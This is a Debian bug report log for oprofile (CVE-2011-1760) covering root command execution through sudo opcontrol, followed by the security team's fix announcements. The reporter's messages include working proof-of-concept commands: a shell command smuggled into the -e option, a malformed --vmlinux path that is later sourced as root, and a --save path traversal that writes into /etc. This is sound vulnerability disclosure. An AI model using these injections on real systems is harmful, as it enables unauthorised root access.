Debian Bug report logs - #624212
arbitrary command execution via sudo opcontrol

version graph

Package: oprofile; Maintainer for oprofile is LIU Qi <liuqi82@gmail.com>;

Reported by: Stephane Chauveau <stephane.chauveau@caps-entreprise.com>

Date: Tue, 26 Apr 2011 14:15:02 UTC

Severity: important

Tags: security

Found in versions oprofile/0.9.6-1.1, oprofile/0.9.6-1.3

Fixed in versions oprofile/0.9.6-1.4, oprofile/0.9.3-2+lenny2, oprofile/0.9.6-1.1+squeeze2

Done: Luciano Bello <luciano@debian.org>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, LIU Qi <liuqi82@gmail.com>:
Bug#624212; Package oprofile. (Tue, 26 Apr 2011 14:15:05 GMT) Full text and rfc822 format available.

Acknowledgement sent to Stephane Chauveau <stephane.chauveau@caps-entreprise.com>:
New Bug report received and forwarded. Copy sent to LIU Qi <liuqi82@gmail.com>. (Tue, 26 Apr 2011 14:15:05 GMT) Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Stephane Chauveau <stephane.chauveau@caps-entreprise.com>
To: submit@bugs.debian.org
Subject: arbitrary command execution via sudo opcontrol
Date: Tue, 26 Apr 2011 16:06:43 +0200
Package: oprofile
Version: 0.9.6-1.1

I found a way to execute arbitrary commands when using opcontrol via 
sudo. I realize that sudoing shell scripts is a bad idea (the oprofile 
FAQ discourages the use of sudo) but sudo is nevertheless a common 
advice on internet to provide oprofile to a user without giving him full 
root-access.

The problem is in the set_event function where the content of $2 is not 
checked.

set_event()
{
  eval "CHOSEN_EVENTS_$1=$2"
}

This error can be exploited by injecting commands via the -e option as 
in the following example:

$ sudo opcontrol -e "abcd;/usr/bin/id"
uid=0(root) gid=0(root) groups=0(root)
No such event "abcd"

This is a different vulnerability than
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0576










Severity set to 'important' from 'normal' Request was from Luciano Bello <luciano@debian.org> to control@bugs.debian.org. (Fri, 29 Apr 2011 14:42:02 GMT) Full text and rfc822 format available.

Added tag(s) security. Request was from Luciano Bello <luciano@debian.org> to control@bugs.debian.org. (Fri, 29 Apr 2011 14:42:03 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, LIU Qi <liuqi82@gmail.com>:
Bug#624212; Package oprofile. (Tue, 03 May 2011 01:21:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Stephane Chauveau <stephane@chauveau-central.net>:
Extra info received and forwarded to list. Copy sent to LIU Qi <liuqi82@gmail.com>. (Tue, 03 May 2011 01:21:02 GMT) Full text and rfc822 format available.

Message #14 received at 624212@bugs.debian.org (full text, mbox):

From: Stephane Chauveau <stephane@chauveau-central.net>
To: 624212@bugs.debian.org
Subject: More ways to execute root commands
Date: Tue, 03 May 2011 03:11:28 +0200
I just found 2 more ways to execute arbitrary commands via sudo opcontrol

################# Method 1 ##################

The problem is in the functions do_save_setup() where multiple values 
are saved in the shell script /root/.oprofile/daemonrc.

That file is sourced in do_load_setup() by later invocations of opcontrol.

The function do_save_setup() does not sanitize the values and thus 
allows do_load_setup() to execute arbitrary commands.

There is even a comment in do_load_setup that indicates that the method 
is known to be insecure

Here is a possible method using the --vmlinux option:

(1) create a fake vmlinux file with a 'malformed' name

#  touch "$HOME/abcd;id"

(2) start the oprofile daemon using that vmlinux file. This creates the 
daemonrc file

# sudo opcontrol   --vmlinux="$HOME/aaaa;id"

(3) Any invocation of opcontrol will now source the malformed daemonrc 
file as root.

# sudo opcontrol   --stop
uid=0(root) gid=0(root) groups=0(root)
Daemon not running

(4) The daemonrc file can be cleared with

# sudo opcontrol   --no-vmlinux

The same trick can probably be used with the --session-dir and --xen 
options.

################# Method 2 ##################

The --save=name option is moving samples/current to samples/name in the 
current session directory.

A proper combination of  --session-dir and --save can be used to copy a 
file to any location.

The following example shows how to create a file /etc/XXX

(1) Create a 'samples' directory

# mkdir -p /tmp/xxx/samples

(2) Create a file named 'current' in that directory

# echo "my_commands" > /tmp/xxx/samples/current

(3) Set the oprofile session directory to the root of the 'samples' 
directory

# sudo opcontrol --session-dir=/tmp/xxx

(4)  Execute --save with a path relative to the 'current' file

#  sudo opcontrol --save=../../../etc/XXX













Information forwarded to debian-bugs-dist@lists.debian.org, LIU Qi <liuqi82@gmail.com>:
Bug#624212; Package oprofile. (Tue, 03 May 2011 09:12:04 GMT) Full text and rfc822 format available.

Acknowledgement sent to Stephane Chauveau <stephane.chauveau@caps-entreprise.com>:
Extra info received and forwarded to list. Copy sent to LIU Qi <liuqi82@gmail.com>. (Tue, 03 May 2011 09:12:06 GMT) Full text and rfc822 format available.

Message #19 received at 624212@bugs.debian.org (full text, mbox):

From: Stephane Chauveau <stephane.chauveau@caps-entreprise.com>
To: 624212@bugs.debian.org
Subject: One more method
Date: Tue, 03 May 2011 11:02:54 +0200
I do not have a working example yet but I believe that privileges can 
also be escalated with the following method.

The problem is the following command in do_dump_data

  echo do_jitconv > $SESSION_DIR/opd_pipe

SESSION_DIR can be controlled by the --session-dir option so a malicious 
user could  very well replace the fifo $SESSION_DIR/opd_pipe by a 
symbolic link.

In theory it becomes possible to create an arbitrary file containing the 
text "do_jitconv"

I am not a security expert but I am pretty sure that this is enough to 
obtain root privileges for example by creating a custom entry in 
/etc/ld.so.conf.d/

Generally speaking, allowing sudoers to change the oprofile session 
directory without any controls is probably a very bad idea. The feature 
is probably needed to avoid disk quota issues so an etc configuration 
file listing all possible session directories could be the solution.






Reply sent to Luciano Bello <luciano@debian.org>:
You have taken responsibility. (Sat, 21 May 2011 04:51:04 GMT) Full text and rfc822 format available.

Notification sent to Stephane Chauveau <stephane.chauveau@caps-entreprise.com>:
Bug acknowledged by developer. (Sat, 21 May 2011 04:51:04 GMT) Full text and rfc822 format available.

Message #24 received at 624212-close@bugs.debian.org (full text, mbox):

From: Luciano Bello <luciano@debian.org>
To: 624212-close@bugs.debian.org
Subject: Bug#624212: fixed in oprofile 0.9.6-1.2
Date: Sat, 21 May 2011 04:47:23 +0000
Source: oprofile
Source-Version: 0.9.6-1.2

We believe that the bug you reported is fixed in the latest version of
oprofile, which is due to be installed in the Debian FTP archive:

oprofile-gui_0.9.6-1.2_amd64.deb
  to main/o/oprofile/oprofile-gui_0.9.6-1.2_amd64.deb
oprofile_0.9.6-1.2.diff.gz
  to main/o/oprofile/oprofile_0.9.6-1.2.diff.gz
oprofile_0.9.6-1.2.dsc
  to main/o/oprofile/oprofile_0.9.6-1.2.dsc
oprofile_0.9.6-1.2_amd64.deb
  to main/o/oprofile/oprofile_0.9.6-1.2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 624212@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Luciano Bello <luciano@debian.org> (supplier of updated oprofile package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Fri, 20 May 2011 01:38:53 -0300
Source: oprofile
Binary: oprofile oprofile-gui
Architecture: source amd64
Version: 0.9.6-1.2
Distribution: unstable
Urgency: high
Maintainer: LIU Qi <liuqi82@gmail.com>
Changed-By: Luciano Bello <luciano@debian.org>
Description: 
 oprofile   - system-wide profiler for Linux systems
 oprofile-gui - system-wide profiler for Linux systems (GUI components)
Closes: 624212 625060
Changes: 
 oprofile (0.9.6-1.2) unstable; urgency=high
 .
   * Non-maintainer upload.
   * Add patch by William Cohen to not use mutable for reference variable
     (Closes: #625060)
   * Add patches by William Cohen to fix argument sanitation, CVE-2011-1760.
     This fixes the arbitrary command execution via opcontrol. (Closes: #624212)
Checksums-Sha1: 
 87fa14b26def8f8e893e7666eef9e81b83a8bf24 1433 oprofile_0.9.6-1.2.dsc
 f34cb2c602865983156743cc5c41f028b23f5227 17055 oprofile_0.9.6-1.2.diff.gz
 526671459c70e584b95061efd719817a8e7a4b80 3306680 oprofile_0.9.6-1.2_amd64.deb
 6eac3f37e33c64f8ceab2f7682406e16d4f89f59 96314 oprofile-gui_0.9.6-1.2_amd64.deb
Checksums-Sha256: 
 591a68ca174a9e7bdbd5f088618d745533c536565be398575b7477fabaea9cd9 1433 oprofile_0.9.6-1.2.dsc
 f2d110dc1d3b5a293d35d5f3a0c19f5a0fa60779520abb3d0d4affefa098012b 17055 oprofile_0.9.6-1.2.diff.gz
 97f8bcae24075fb966b1ed3449306be9ed403424bad7d9af1a6a75f09085e863 3306680 oprofile_0.9.6-1.2_amd64.deb
 89544477de00f9c2c6f688922b7c9a3e43642b80e8f02b80d1b8c409891ecf40 96314 oprofile-gui_0.9.6-1.2_amd64.deb
Files: 
 fb8ed5251713af983f22896147fdbaa3 1433 devel optional oprofile_0.9.6-1.2.dsc
 23b1e5464ab2c79fbf73fac50f3af958 17055 devel optional oprofile_0.9.6-1.2.diff.gz
 0105a24137dda9ae493e75843cb0f808 3306680 devel optional oprofile_0.9.6-1.2_amd64.deb
 62fbf37315798def289d9496c47802d7 96314 devel optional oprofile-gui_0.9.6-1.2_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAk3W5q4ACgkQQWTRs4lLtHnArQCffJ+GmzoCkxfcX+QpRrOZgK4b
UDwAoISMdMhZo1Beo1LSvUv91CtaBXwA
=2xjX
-----END PGP SIGNATURE-----





Reply sent to Luciano Bello <luciano@debian.org>:
You have taken responsibility. (Sat, 04 Jun 2011 14:00:03 GMT) Full text and rfc822 format available.

Notification sent to Stephane Chauveau <stephane.chauveau@caps-entreprise.com>:
Bug acknowledged by developer. (Sat, 04 Jun 2011 14:00:03 GMT) Full text and rfc822 format available.

Message #29 received at 624212-close@bugs.debian.org (full text, mbox):

From: Luciano Bello <luciano@debian.org>
To: 624212-close@bugs.debian.org
Subject: Bug#624212: fixed in oprofile 0.9.3-2+lenny1
Date: Sat, 04 Jun 2011 13:56:39 +0000
Source: oprofile
Source-Version: 0.9.3-2+lenny1

We believe that the bug you reported is fixed in the latest version of
oprofile, which is due to be installed in the Debian FTP archive:

oprofile-gui_0.9.3-2+lenny1_amd64.deb
  to main/o/oprofile/oprofile-gui_0.9.3-2+lenny1_amd64.deb
oprofile_0.9.3-2+lenny1.dsc
  to main/o/oprofile/oprofile_0.9.3-2+lenny1.dsc
oprofile_0.9.3-2+lenny1.tar.gz
  to main/o/oprofile/oprofile_0.9.3-2+lenny1.tar.gz
oprofile_0.9.3-2+lenny1_amd64.deb
  to main/o/oprofile/oprofile_0.9.3-2+lenny1_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 624212@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Luciano Bello <luciano@debian.org> (supplier of updated oprofile package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Sat, 21 May 2011 11:59:50 -0300
Source: oprofile
Binary: oprofile oprofile-gui
Architecture: source amd64
Version: 0.9.3-2+lenny1
Distribution: oldstable-security
Urgency: high
Maintainer: Al Stone <ahs3@debian.org>
Changed-By: Luciano Bello <luciano@debian.org>
Description: 
 oprofile   - system-wide profiler for Linux systems
 oprofile-gui - system-wide profiler for Linux systems (GUI components)
Closes: 624212
Changes: 
 oprofile (0.9.3-2+lenny1) oldstable-security; urgency=high
 .
   * Non-maintainer upload by the Security Team.
   * Add patches by William Cohen to fix argument sanitation, CVE-2011-1760.
     This fixes the arbitrary command execution via opcontrol. (Closes: #624212)
Checksums-Sha1: 
 7e95d6bc56e93389ac99488e257234ad9d65b672 927 oprofile_0.9.3-2+lenny1.dsc
 98b76a1b6972192f64545ae3ff924c2653dc5733 874695 oprofile_0.9.3-2+lenny1.tar.gz
 2be98243705db3cf92afafdd30d1f30c7de71885 1302860 oprofile_0.9.3-2+lenny1_amd64.deb
 3ca53be8f94560a3092e3aceb90cb050aac17cdf 94026 oprofile-gui_0.9.3-2+lenny1_amd64.deb
Checksums-Sha256: 
 06c1dd30920b2480c4d141bb54502b597c81e1b344ee7730c9d0ecc318ec35eb 927 oprofile_0.9.3-2+lenny1.dsc
 ccbc7f4ff6834cb29a35775ffa5d8b3fddc700399279face5a24b5dc0d1f4d60 874695 oprofile_0.9.3-2+lenny1.tar.gz
 96c3c67491f218a261d695af4f8e78eb9d9461da923f5d247af807f170b6e582 1302860 oprofile_0.9.3-2+lenny1_amd64.deb
 9339be9a5b9c83e04ebdebfb3774b64ced523e0ed077d33aaed247395d470f14 94026 oprofile-gui_0.9.3-2+lenny1_amd64.deb
Files: 
 f52e7d939ff387bfba09d3c2db466d75 927 devel optional oprofile_0.9.3-2+lenny1.dsc
 5a0ec5293789baf466b1f583c119fd40 874695 devel optional oprofile_0.9.3-2+lenny1.tar.gz
 720c41f2f3e03ac77993129575d0c78b 1302860 devel optional oprofile_0.9.3-2+lenny1_amd64.deb
 bf849b2a9678188b98637bf29570a594 94026 devel optional oprofile-gui_0.9.3-2+lenny1_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAk3Ya8kACgkQQWTRs4lLtHlxbwCcCMWzDw+sVkEKGq7jXuMCcwl/
A3sAniMBtoolgoMxDkJAc4DkoASYIiu3
=zSDg
-----END PGP SIGNATURE-----





Reply sent to Luciano Bello <luciano@debian.org>:
You have taken responsibility. (Sat, 04 Jun 2011 14:00:05 GMT) Full text and rfc822 format available.

Notification sent to Stephane Chauveau <stephane.chauveau@caps-entreprise.com>:
Bug acknowledged by developer. (Sat, 04 Jun 2011 14:00:06 GMT) Full text and rfc822 format available.

Message #34 received at 624212-close@bugs.debian.org (full text, mbox):

From: Luciano Bello <luciano@debian.org>
To: 624212-close@bugs.debian.org
Subject: Bug#624212: fixed in oprofile 0.9.6-1.1+squeeze1
Date: Sat, 04 Jun 2011 13:56:46 +0000
Source: oprofile
Source-Version: 0.9.6-1.1+squeeze1

We believe that the bug you reported is fixed in the latest version of
oprofile, which is due to be installed in the Debian FTP archive:

oprofile-gui_0.9.6-1.1+squeeze1_amd64.deb
  to main/o/oprofile/oprofile-gui_0.9.6-1.1+squeeze1_amd64.deb
oprofile_0.9.6-1.1+squeeze1.diff.gz
  to main/o/oprofile/oprofile_0.9.6-1.1+squeeze1.diff.gz
oprofile_0.9.6-1.1+squeeze1.dsc
  to main/o/oprofile/oprofile_0.9.6-1.1+squeeze1.dsc
oprofile_0.9.6-1.1+squeeze1_amd64.deb
  to main/o/oprofile/oprofile_0.9.6-1.1+squeeze1_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 624212@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Luciano Bello <luciano@debian.org> (supplier of updated oprofile package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Fri, 20 May 2011 18:00:08 -0300
Source: oprofile
Binary: oprofile oprofile-gui
Architecture: source amd64
Version: 0.9.6-1.1+squeeze1
Distribution: stable-security
Urgency: high
Maintainer: LIU Qi <liuqi82@gmail.com>
Changed-By: Luciano Bello <luciano@debian.org>
Description: 
 oprofile   - system-wide profiler for Linux systems
 oprofile-gui - system-wide profiler for Linux systems (GUI components)
Closes: 624212
Changes: 
 oprofile (0.9.6-1.1+squeeze1) stable-security; urgency=high
 .
   * Non-maintainer upload by the Security Team.
   * Add patches by William Cohen to fix argument sanitation, CVE-2011-1760.
     This fixes the arbitrary command execution via opcontrol. (Closes: #624212)
Checksums-Sha1: 
 435e227afc6563c99d6ca5897b99633e1766d905 1469 oprofile_0.9.6-1.1+squeeze1.dsc
 cc62cc58c574e235bc146c8ddc9d9a9af0972fd1 1321536 oprofile_0.9.6.orig.tar.gz
 6c2067e21ecdc3339460c300c525e338ba75af33 16788 oprofile_0.9.6-1.1+squeeze1.diff.gz
 1e9e89b61b0799ec8dfa552c96a86dfe071c8b95 3160458 oprofile_0.9.6-1.1+squeeze1_amd64.deb
 c7a5a3019c8ef9bf8f411b992737d3e70749d24c 97570 oprofile-gui_0.9.6-1.1+squeeze1_amd64.deb
Checksums-Sha256: 
 d92eca31b5a9cfa3f27ecd8f82bc1900cc81000382cb8903892dbbb17104198e 1469 oprofile_0.9.6-1.1+squeeze1.dsc
 3f0dd40a7749fc650d25d79d42ebbff8f3b6db310c36e7c3839696cc09077880 1321536 oprofile_0.9.6.orig.tar.gz
 1d89c2157b696fe6223421876e7a607699df95e007b85e9578ecf3b7cb17e011 16788 oprofile_0.9.6-1.1+squeeze1.diff.gz
 870482186dce209a5d89c2c155f6dcf131c187f9cf0bdaa23f1aecbb55d92a17 3160458 oprofile_0.9.6-1.1+squeeze1_amd64.deb
 e7474acadcf0716533bf803ef456949b22279e68f568556a2b1250056ee515cf 97570 oprofile-gui_0.9.6-1.1+squeeze1_amd64.deb
Files: 
 7c3309a6aa2a43218894bcda35a279e8 1469 devel optional oprofile_0.9.6-1.1+squeeze1.dsc
 4e407093ac06200185d5a5e6437d7242 1321536 devel optional oprofile_0.9.6.orig.tar.gz
 e53c69c4d3cf885bf2b0ece920fce5fd 16788 devel optional oprofile_0.9.6-1.1+squeeze1.diff.gz
 debccf21da61e4f9b7041d4c30e9e7b9 3160458 devel optional oprofile_0.9.6-1.1+squeeze1_amd64.deb
 f28e79feafdb6119115e99bd886b30a6 97570 devel optional oprofile-gui_0.9.6-1.1+squeeze1_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAk3Ya7oACgkQQWTRs4lLtHkReACfbXXWH1u/dR5kb0B/drnKuA5A
ugQAnRbQgDW4TNubkp0ogkt6l16L1Bs9
=Smfk
-----END PGP SIGNATURE-----





Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 03 Jul 2011 07:33:33 GMT) Full text and rfc822 format available.

Bug unarchived. Request was from Luciano Bello <luciano@debian.org> to control@bugs.debian.org. (Sat, 09 Jul 2011 01:09:02 GMT) Full text and rfc822 format available.

Bug No longer marked as fixed in versions oprofile/0.9.6-1.2, oprofile/0.9.3-2+lenny1, and oprofile/0.9.6-1.1+squeeze1 and reopened. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sat, 09 Jul 2011 01:09:03 GMT) Full text and rfc822 format available.

Bug Marked as found in versions oprofile/0.9.6-1.3. Request was from Luciano Bello <luciano@debian.org> to control@bugs.debian.org. (Sat, 09 Jul 2011 03:21:03 GMT) Full text and rfc822 format available.

Reply sent to Luciano Bello <luciano@debian.org>:
You have taken responsibility. (Mon, 11 Jul 2011 15:21:07 GMT) Full text and rfc822 format available.

Notification sent to Stephane Chauveau <stephane.chauveau@caps-entreprise.com>:
Bug acknowledged by developer. (Mon, 11 Jul 2011 15:21:08 GMT) Full text and rfc822 format available.

Message #47 received at 624212-close@bugs.debian.org (full text, mbox):

From: Luciano Bello <luciano@debian.org>
To: 624212-close@bugs.debian.org
Subject: Bug#624212: fixed in oprofile 0.9.6-1.4
Date: Mon, 11 Jul 2011 15:17:56 +0000
Source: oprofile
Source-Version: 0.9.6-1.4

We believe that the bug you reported is fixed in the latest version of
oprofile, which is due to be installed in the Debian FTP archive:

oprofile-gui_0.9.6-1.4_amd64.deb
  to main/o/oprofile/oprofile-gui_0.9.6-1.4_amd64.deb
oprofile_0.9.6-1.4.diff.gz
  to main/o/oprofile/oprofile_0.9.6-1.4.diff.gz
oprofile_0.9.6-1.4.dsc
  to main/o/oprofile/oprofile_0.9.6-1.4.dsc
oprofile_0.9.6-1.4_amd64.deb
  to main/o/oprofile/oprofile_0.9.6-1.4_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 624212@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Luciano Bello <luciano@debian.org> (supplier of updated oprofile package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Sat, 09 Jul 2011 19:54:57 -0300
Source: oprofile
Binary: oprofile oprofile-gui
Architecture: source amd64
Version: 0.9.6-1.4
Distribution: unstable
Urgency: high
Maintainer: LIU Qi <liuqi82@gmail.com>
Changed-By: Luciano Bello <luciano@debian.org>
Description: 
 oprofile   - system-wide profiler for Linux systems
 oprofile-gui - system-wide profiler for Linux systems (GUI components)
Closes: 624212
Changes: 
 oprofile (0.9.6-1.4) unstable; urgency=high
 .
   * Non-maintainer upload.
   * Jamie Strandboge noticed an uncomplete fix for CVE-2011-1760 Closes: #624212
Checksums-Sha1: 
 847978e460719c34733145a99d3af80484b187be 1433 oprofile_0.9.6-1.4.dsc
 c6f5fd8d8668655d68e6b67ae0d6b214558ccf3b 17136 oprofile_0.9.6-1.4.diff.gz
 d5b35c55a9e4eae5d3403a1dc7cc85775d0fa1a8 3321658 oprofile_0.9.6-1.4_amd64.deb
 5a74b18524796531173af9e27a4466e18409d4a4 96256 oprofile-gui_0.9.6-1.4_amd64.deb
Checksums-Sha256: 
 1f1cf8a3a6827bf3a792a701fc1a698de90449edce63ce669556747bc77738b5 1433 oprofile_0.9.6-1.4.dsc
 09e210865260d457b7395c1ef4dd864198931586e889f18c2bc9347f95844bcc 17136 oprofile_0.9.6-1.4.diff.gz
 ed5094664ca47eecf68ae847a714ef6726785d8de3005a277e23473a77157cfc 3321658 oprofile_0.9.6-1.4_amd64.deb
 42725edab971dc71045a5e5d6d7dd43ae052290445b42691a204e1ce75b09066 96256 oprofile-gui_0.9.6-1.4_amd64.deb
Files: 
 649f080613dcc29dd5db8d9af4879b0b 1433 devel optional oprofile_0.9.6-1.4.dsc
 6aeaece1658d6c1dee0f8a322b8e4923 17136 devel optional oprofile_0.9.6-1.4.diff.gz
 2333798322adb6ab1ae34ec70ac5fbd2 3321658 devel optional oprofile_0.9.6-1.4_amd64.deb
 9ea5e9042495add580de6fbfbe89bd31 96256 devel optional oprofile-gui_0.9.6-1.4_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk4bEMQACgkQQWTRs4lLtHmJkQCfSqMlr6/y3y0ajIu5h8AtwqQ6
NGUAn0tcRIDUuAmR6OqUW+UW9yJlYMgn
=C1Kn
-----END PGP SIGNATURE-----





Reply sent to Luciano Bello <luciano@debian.org>:
You have taken responsibility. (Sun, 17 Jul 2011 01:57:05 GMT) Full text and rfc822 format available.

Notification sent to Stephane Chauveau <stephane.chauveau@caps-entreprise.com>:
Bug acknowledged by developer. (Sun, 17 Jul 2011 01:57:05 GMT) Full text and rfc822 format available.

Message #52 received at 624212-close@bugs.debian.org (full text, mbox):

From: Luciano Bello <luciano@debian.org>
To: 624212-close@bugs.debian.org
Subject: Bug#624212: fixed in oprofile 0.9.3-2+lenny2
Date: Sun, 17 Jul 2011 01:55:21 +0000
Source: oprofile
Source-Version: 0.9.3-2+lenny2

We believe that the bug you reported is fixed in the latest version of
oprofile, which is due to be installed in the Debian FTP archive:

oprofile-gui_0.9.3-2+lenny2_amd64.deb
  to main/o/oprofile/oprofile-gui_0.9.3-2+lenny2_amd64.deb
oprofile_0.9.3-2+lenny2.dsc
  to main/o/oprofile/oprofile_0.9.3-2+lenny2.dsc
oprofile_0.9.3-2+lenny2.tar.gz
  to main/o/oprofile/oprofile_0.9.3-2+lenny2.tar.gz
oprofile_0.9.3-2+lenny2_amd64.deb
  to main/o/oprofile/oprofile_0.9.3-2+lenny2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 624212@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Luciano Bello <luciano@debian.org> (supplier of updated oprofile package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Fri, 08 Jul 2011 21:11:54 -0300
Source: oprofile
Binary: oprofile oprofile-gui
Architecture: source amd64
Version: 0.9.3-2+lenny2
Distribution: oldstable-security
Urgency: low
Maintainer: Al Stone <ahs3@debian.org>
Changed-By: Luciano Bello <luciano@debian.org>
Description: 
 oprofile   - system-wide profiler for Linux systems
 oprofile-gui - system-wide profiler for Linux systems (GUI components)
Closes: 624212
Changes: 
 oprofile (0.9.3-2+lenny2) oldstable-security; urgency=low
 .
   * Non-maintainer upload by the Security Team.
   * Jamie Strandboge noticed an uncomplete fix for CVE-2011-1760 Closes: #624212
Checksums-Sha1: 
 02cd5fadbf9d6c80c216a9410713e4dfc64c3d6f 927 oprofile_0.9.3-2+lenny2.dsc
 f56b1bcd53ba1755da01498b6be87f9752a07677 874857 oprofile_0.9.3-2+lenny2.tar.gz
 8334a645a95fdccb82fe8bbbab6582927f26b987 1302884 oprofile_0.9.3-2+lenny2_amd64.deb
 64e22276e565c3711d9bd989306b715d81bcb7aa 94070 oprofile-gui_0.9.3-2+lenny2_amd64.deb
Checksums-Sha256: 
 766a9cbcf6ded2113e74bb9fc35d40a55beccfef71238ca98b13ba972ed4fa40 927 oprofile_0.9.3-2+lenny2.dsc
 3fe4cb51b8fcbf0d8f043ca2563523ec99ff602e674562bde6afb64a426406ea 874857 oprofile_0.9.3-2+lenny2.tar.gz
 3934fd717b379cb1b75bc406886cedb621320e6f154f07aab48e3ee8e6f8800c 1302884 oprofile_0.9.3-2+lenny2_amd64.deb
 e18eb8688136a1aad9ebadf9b5ddea7c117620a598fecacd50ce603dca1ea198 94070 oprofile-gui_0.9.3-2+lenny2_amd64.deb
Files: 
 37bc1e69fe628fbac0c00cef8e810ff5 927 devel optional oprofile_0.9.3-2+lenny2.dsc
 2c075459bd60f708b04c58e54df9f065 874857 devel optional oprofile_0.9.3-2+lenny2.tar.gz
 0322684d55649d296e83c6f2b3374869 1302884 devel optional oprofile_0.9.3-2+lenny2_amd64.deb
 dbbbe3a53e51e29d3dbe6d065eaf967f 94070 devel optional oprofile-gui_0.9.3-2+lenny2_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk4bE20ACgkQQWTRs4lLtHldewCeMWhchG4psUCTjMEeG5KFBWaS
mH8An3Ki1eLG5HNzkCtYeXxKs2b8W3tu
=cmKW
-----END PGP SIGNATURE-----





Reply sent to Luciano Bello <luciano@debian.org>:
You have taken responsibility. (Tue, 19 Jul 2011 01:57:07 GMT) Full text and rfc822 format available.

Notification sent to Stephane Chauveau <stephane.chauveau@caps-entreprise.com>:
Bug acknowledged by developer. (Tue, 19 Jul 2011 01:57:07 GMT) Full text and rfc822 format available.

Message #57 received at 624212-close@bugs.debian.org (full text, mbox):

From: Luciano Bello <luciano@debian.org>
To: 624212-close@bugs.debian.org
Subject: Bug#624212: fixed in oprofile 0.9.6-1.1+squeeze2
Date: Tue, 19 Jul 2011 01:54:45 +0000
Source: oprofile
Source-Version: 0.9.6-1.1+squeeze2

We believe that the bug you reported is fixed in the latest version of
oprofile, which is due to be installed in the Debian FTP archive:

oprofile-gui_0.9.6-1.1+squeeze2_amd64.deb
  to main/o/oprofile/oprofile-gui_0.9.6-1.1+squeeze2_amd64.deb
oprofile_0.9.6-1.1+squeeze2.diff.gz
  to main/o/oprofile/oprofile_0.9.6-1.1+squeeze2.diff.gz
oprofile_0.9.6-1.1+squeeze2.dsc
  to main/o/oprofile/oprofile_0.9.6-1.1+squeeze2.dsc
oprofile_0.9.6-1.1+squeeze2_amd64.deb
  to main/o/oprofile/oprofile_0.9.6-1.1+squeeze2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 624212@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Luciano Bello <luciano@debian.org> (supplier of updated oprofile package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Fri, 08 Jul 2011 21:02:50 -0300
Source: oprofile
Binary: oprofile oprofile-gui
Architecture: source amd64
Version: 0.9.6-1.1+squeeze2
Distribution: stable-security
Urgency: low
Maintainer: LIU Qi <liuqi82@gmail.com>
Changed-By: Luciano Bello <luciano@debian.org>
Description: 
 oprofile   - system-wide profiler for Linux systems
 oprofile-gui - system-wide profiler for Linux systems (GUI components)
Closes: 624212
Changes: 
 oprofile (0.9.6-1.1+squeeze2) stable-security; urgency=low
 .
   * Non-maintainer upload by the Security Team.
   * Jamie Strandboge noticed an uncomplete fix for CVE-2011-1760 Closes: #624212
Checksums-Sha1: 
 6804f68cb60e6b9bd0bec8d787fbfed44b49eb53 1469 oprofile_0.9.6-1.1+squeeze2.dsc
 6cdc5316c46bb309beeae242f30fdd9a820eb689 16764 oprofile_0.9.6-1.1+squeeze2.diff.gz
